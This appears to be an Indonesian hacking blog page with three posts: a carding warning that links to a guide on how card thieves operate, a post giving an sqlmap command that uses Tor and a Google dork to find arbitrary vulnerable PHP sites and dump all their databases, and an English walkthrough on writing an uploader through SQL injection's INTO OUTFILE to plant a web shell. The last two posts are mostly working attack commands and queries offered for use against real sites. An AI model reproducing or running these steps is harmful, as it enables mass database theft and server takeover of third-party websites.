Tampilkan postingan dengan label SQL Injection. Tampilkan semua postingan

Minggu, 24 Januari 2016

Waspada pencurian kartu kredit secara online

3 komentar :


Maraknya pencurian kartu kredit secara online kini sudah tidak asing lagi bagi kita. Mungkin beberapa dari kalian pernah melakukan / menjadi korban ini.

Pencurian kartu kredit atau dengan bahasa IT nya adalah Carding adalah berbelanja menggunakan nomor dan identitas kartu kredit orang lain, yang diperoleh secara ilegal, biasanya dengan mencuri data di internet. Sebutan pelakunya adalah “carder”. Seorang pelaku carding (carder) tidak perlu mencuri kartu kredit orang lain tersebut untuk melakukan transaksi di internet. Sebagai informasi, transaksi kartu kredit di internet cukup dilakukan dengan memasukkan nomor kartu kredit dan nomor rahasia yang biasanya terdiri dari 3 digit di balik kartu dan nomor kadaluarsa kartu tersebut.

Keamanan IT Kini Tidak Lagi Cukup dengan Hanya Memblokir dan Berharap Aman . Pada tahun 2013, Akamai Technologies yang berbasis di USA, mempublikasikan laporan yang menyatakan bahwa Indonesia bertanggung jawab atas 38 persen trafik serangan peretas di dunia. Lucunya, angka itu terus bertambah.

Dan mirisnya lagi para pelaku rata rata adalah Pelajar. Disinipun saya mengaku bahwa saya pernah mencoba melakukan bagaimana si pelaku melakukan kejahatanya. " Tetapi saya tidak menggunakan kartu kredit tsb, saya tidak melakukan lebih dalam caranya " .

Cara Carder melakukan kejahatannya bisa anda lihat di database kami : http://files.zero-security.id/list/Zer0%20Security%20-%20Pencurian%20Kartu%20Kredit.docx

jangan lupa membaca http://files.zero-security.id/list/readme.txt

Bagaimana cara menghindar dari pencurian kartu kredit ini?

Pertama bisa dilihat didalam website http://www.halomoney.co.id/blog/waspadai-4-modus-pencurian-data-kartu-kredit

Saya memberi tambahan cara mengatasinya.
Rata rata sekarang para carder melakukannya dengan teknik spamming.

Jadi mereka menggunakan mailler dengan halaman & website palsu yang serupa dengan verifikasi / login kartu kredit / PayPal / dll

contoh mereka membuat suatu website yaitu cgi-updatepaypal.com , tentu saja kalian merasa aneh dengan domain tersebut.

Jangan pernah memasukan email & password ke sembarang website. karna situs resmi PayPal adalah https://www.paypal.com/

Bersambung ...

Kamis, 20 Agustus 2015

Otomatis Sql Injection dengan SqlMap dan Tor

1 komentar :
Apa itu SqlMap ? SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.

Pertama tama download tor di sini https://www.torproject.org/ .

atau pada Ubuntu bisa gunakan command : 
sudo apt-get install -y tor

lakukan perinah mulai tor pada Ubuntu :
sudo service tor start

download Sqlmap di sini http://sqlmap.org/

perintah agar otomatis nge scan :

sqlmap.py --tor --tor-type=SOCKS5 -g "inurl:.php?id=1" --random-agent --dump-all --batch --time-sec=15


terima kasih ..

Jumat, 12 Juni 2015

Uploading Shell Using SQL Injection

Tidak ada komentar :


SQLi is a fun thing I thought, cause we can do something cool, like we can make some pop up alert, or using HTML code, and we can make phising concept inside SQL Injection. Thats awesome right? For this time I wanna share about "Uploading Shell Using SQL Injection", all you need is:

  • Your must have write privileges and a writable directory (where you have to upload your shell)
  • Root Path (i.e /var/www/website/ or C:\xampp\blablabla....)
  • Magic Qoutes must be enable
Let's check write permissions?
How to check it?
group_concat(user,0x203a20,file_priv) from mysql.user
So our query will be like this
http://localhost/sqli/vuln.php?id=-1 union select group_concat(user,0x203a20,file_priv) from mysql.user-- -



If say Y after current user, we have an access. Next step is lets write uor uploader using INTO OUTFILEsyntax
'our script in here' INTO OUTFILE "filepath"
You can see uploader in here "Uploader"..and then you can conver it into hexa
http://pastebin.com/PvmxDHTk (Look Here This Code)
And then open it
http://localhost/sqli/uploader.php

And we can see our uploader


 Upload your shell..

And open your shell

# Thanks For You All :D